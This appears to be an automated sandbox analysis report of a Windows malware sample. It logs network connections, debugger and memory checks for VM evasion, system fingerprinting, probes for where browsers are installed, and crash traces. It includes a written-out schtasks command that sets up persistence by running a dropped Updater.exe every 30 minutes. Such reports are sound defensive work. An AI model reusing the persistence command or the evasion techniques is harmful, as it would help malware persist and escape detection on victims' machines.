TLSv1 192.168.56.103:49189 216.58.203.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	4c:e1:1e:e3:63:49:81:bb:f5:53:ce:44:91:07:8a:14:84:70:7f:66
TLSv1 192.168.56.103:49188 216.58.203.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	4c:e1:1e:e3:63:49:81:bb:f5:53:ce:44:91:07:8a:14:84:70:7f:66
TLSv1 192.168.56.103:49209 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49199 142.250.66.36:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	3a:23:7a:7e:16:ae:ac:26:15:62:07:69:2e:e7:ad:8f:9d:b5:90:b7
TLS 1.3 192.168.56.103:49241 125.253.92.50:80	None	None	None
TLSv1 192.168.56.103:49234 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

Queries for the computername (47 events)

Time & API	Arguments	Status	Return
GetComputerNameA Jan. 26, 2024, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 26, 2024, 9:02 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (25 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:01 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0
IsDebuggerPresent Jan. 26, 2024, 9:02 a.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 26, 2024, 9:01 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:01 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:01 a.m.	buffer: SUCCESS: The scheduled task "explorhe.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:02 a.m.	buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:02 a.m.	buffer: chcp console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:02 a.m.	buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:02 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:02 a.m.	buffer: /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F console_handle: 0x00000007	1	1
WriteConsoleW Jan. 26, 2024, 9:02 a.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1
WriteConsoleW Jan. 26, 2024, 9:02 a.m.	buffer: SUCCESS: The scheduled task "MalayamaraUpdate" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 63 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056b130 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056b130 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005740c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005740c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00574000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00574000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f17f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f17f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f20b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f20b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d9198 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d9198 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d92d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00620f28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00621668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00621668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00621368 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071c570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071c9e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00722cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00722cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00722d38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00722d38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 26, 2024, 9:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00504a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 26, 2024, 9:01 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

One or more processes crashed (50 out of 727 events)

Time & API	Arguments	Status
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x293d8a @ 0x1033d8a rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619788 registers.edi: 16965772 registers.eax: 0 registers.ebp: 2619816 registers.edx: 0 registers.ebx: 40579900 registers.esi: 5 registers.ecx: 40579900	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x293d8a @ 0x1033d8a rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619788 registers.edi: 2619788 registers.eax: 0 registers.ebp: 2619816 registers.edx: 0 registers.ebx: 16376303 registers.esi: 0 registers.ecx: 2619996	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295024 @ 0x1035024 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 16965772 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 11436032 registers.esi: 15630336 registers.ecx: 15630336	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295024 @ 0x1035024 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 0 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295024 @ 0x1035024 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 0 registers.ebx: 16376303 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 16965772 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 11436032 registers.esi: 15630336 registers.ecx: 0	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 0 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 0 registers.ebx: 16376303 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 0 registers.ebx: 16376303 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376303 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 0 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295100 @ 0x1035100 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376303 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2951d2 @ 0x10351d2 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 16965772 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 11436032 registers.esi: 15630336 registers.ecx: 2619768	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2951d2 @ 0x10351d2 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2951d2 @ 0x10351d2 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2951d2 @ 0x10351d2 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe1d9 exception.instruction: div eax exception.module: rost.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0xf9e1d9 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 0 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
